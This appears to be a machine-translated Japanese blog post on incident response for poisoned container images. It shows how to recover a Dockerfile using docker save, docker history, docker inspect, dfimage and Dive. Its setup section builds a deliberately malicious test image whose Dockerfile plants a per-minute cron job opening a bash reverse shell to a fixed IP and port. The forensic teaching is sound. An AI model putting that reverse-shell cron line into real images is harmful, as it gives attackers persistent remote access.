Dockerfileファイルを取得するためのDockerイメージ解析

01. 概要

コンテナ イメージのセキュリティに関しては、特にイメージ ポイズニングによるセキュリティ インシデントが発生した場合、イメージのソースをトレースし、Dockerfile ファイルを解析することが、緊急インシデント処理の重要なステップとなります。このブログ記事では、コンテナのセキュリティにとって重要なイメージ解像度から Dockerfile を取得する方法について説明します。

02. 環境整備

Dockfile を使用して、リバウンド シェルの悪意のあるイメージを構築します。

 FROM ubuntu:20.04 RUN apt-get update &&\ apt-get install -y cron &&\ (echo '* * * * * bash -c "bash -i >& /dev/tcp/192.168.99.242/12345 0>&1"'; crontab -l )| crontab ENTRYPOINT ["cron","-f","&&"] CMD ["/bin/bash"]

03. イメージ解析Dockerfile

3.1 画像ファイル解析

イメージのメタデータ情報では、イメージの構築に使用された Dockerfile を正常に解析し、その Dockerfile の内容を取得して、イメージの構築プロセスと導入されたソフトウェア パッケージおよび構成を理解することができます。

 docker save -o test.tar test:v1.0 tar -xvf test.tar

3.2 Dockerコマンドパラメータ

指定したイメージの作成履歴を表示するには、docker history コマンドを使用します。情報の一部のみ表示可能です。すべての情報を表示するには、--no-trunc を追加できます。

 docker history test:v1.0 docker history test:v1.0 --no-trunc

docker inspect コマンドを使用して、Docker イメージの詳細情報を表示します。 --format パラメータを使用して出力情報を自分で定義し、イメージの構成情報を取得できます。

 #查看镜像的配置信息docker inspect --format='{{json .Config}}' test:v1.0

3.3 イメージ

dfimageは、イメージからDockerfileを抽出するために使用できるサードパーティのツールです。

（１）ショートカットを生成します。 dfimage を使用して、非常に詳細な Dockerfile を出力します。

 alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 test:v1.0

3.4 Dockerイメージ解析ツールDive

Dive は、Docker コンテナイメージの内部を解析・閲覧し、各層のファイルの変更内容を詳細に確認できる Docker イメージ解析ツールです。

 alias dive="docker run -ti --rm -v /var/run/docker.sock:/var/run/docker.sock wagoodman/dive" dive test:v1.0

写真